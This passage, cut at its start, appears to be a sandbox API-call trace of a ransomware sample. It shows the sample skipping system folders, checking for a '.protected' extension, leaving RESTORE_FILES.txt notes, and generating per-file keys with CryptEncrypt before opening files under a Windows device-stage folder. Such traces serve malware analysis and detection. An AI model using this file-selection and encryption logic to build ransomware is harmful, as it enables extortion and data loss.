(lpString1="Task", lpString2="Program Files (x86)") returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="$Recycle.bin") returned 1 [0093.142] lstrcmpiW (lpString1="Task", lpString2="System Volume Information") returned 1 [0093.142] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 50 [0093.142] lstrcmpW (lpString1="Task", lpString2=".") returned 1 [0093.142] lstrcmpW (lpString1="Task", lpString2="..") returned 1 [0093.142] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned 52 [0093.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.143] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.143] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\.") returned 52 [0093.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="..", lpString2="System Volume Information") 
returned -1 [0093.143] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\..") returned 53 [0093.143] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.143] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 68 [0093.143] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.143] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.143] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Windows") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files (x86)") returned -1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$Recycle.bin") returned 1 [0093.143] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: pszDest=0x4bfb20, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 89 [0093.144] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0093.144] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0093.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned 91 [0093.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.144] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.144] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\.") returned 91 [0093.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.144] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.144] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.144] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\..") returned 92 [0093.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.144] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.144] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 95 [0093.145] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.145] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 97 [0093.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1=".", lpString2="System Volume 
Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\.") returned 97 [0093.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.145] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.145] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\..") returned 98 [0093.145] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.145] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.145] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.145] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 108 [0093.145] StrStrIW (lpFirst="resource.xml", 
lpSrch=".protected") returned 0x0 [0093.145] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.146] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.146] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.146] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.146] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.146] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.146] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.146] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) 
returned 0 [0093.146] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0093.146] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0093.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 100 [0093.146] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0093.146] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.146] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.146] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="Program Files (x86)") returned -1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="$Recycle.bin") returned 1 [0093.147] lstrcmpiW (lpString1="netfol.ico", lpString2="System Volume Information") returned -1 [0093.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 100 [0093.147] StrStrIW (lpFirst="netfol.ico", lpSrch=".protected") returned 0x0 [0093.147] lstrcmpW (lpString1="netfol.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files (x86)") returned -1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="$Recycle.bin") returned 1 [0093.147] lstrcmpiW (lpString1="pictures.ico", lpString2="System Volume Information") returned -1 [0093.147] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 102 [0093.147] StrStrIW (lpFirst="pictures.ico", lpSrch=".protected") returned 0x0 [0093.147] lstrcmpW (lpString1="pictures.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.147] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.147] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.147] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 102 [0093.148] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.148] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW 
(lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 107 [0093.148] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.148] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Windows") returned -1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files (x86)") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="$Recycle.bin") returned 1 [0093.148] lstrcmpiW (lpString1="ringtones.ico", lpString2="System Volume Information") returned -1 [0093.148] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 103 [0093.148] StrStrIW (lpFirst="ringtones.ico", lpSrch=".protected") returned 0x0 [0093.148] lstrcmpW (lpString1="ringtones.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.148] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.148] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.148] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Windows") returned -1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files (x86)") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="$Recycle.bin") returned 1 [0093.149] lstrcmpiW (lpString1="settings.ico", lpString2="System Volume Information") returned -1 [0093.149] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 102 [0093.149] StrStrIW (lpFirst="settings.ico", lpSrch=".protected") returned 0x0 [0093.149] lstrcmpW (lpString1="settings.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Windows") returned -1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files (x86)") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="$Recycle.bin") returned 1 [0093.149] lstrcmpiW (lpString1="sync.ico", lpString2="System Volume Information") returned -1 [0093.149] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 98 [0093.149] StrStrIW (lpFirst="sync.ico", lpSrch=".protected") returned 0x0 [0093.149] lstrcmpW (lpString1="sync.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.149] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.149] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.149] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.149] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 
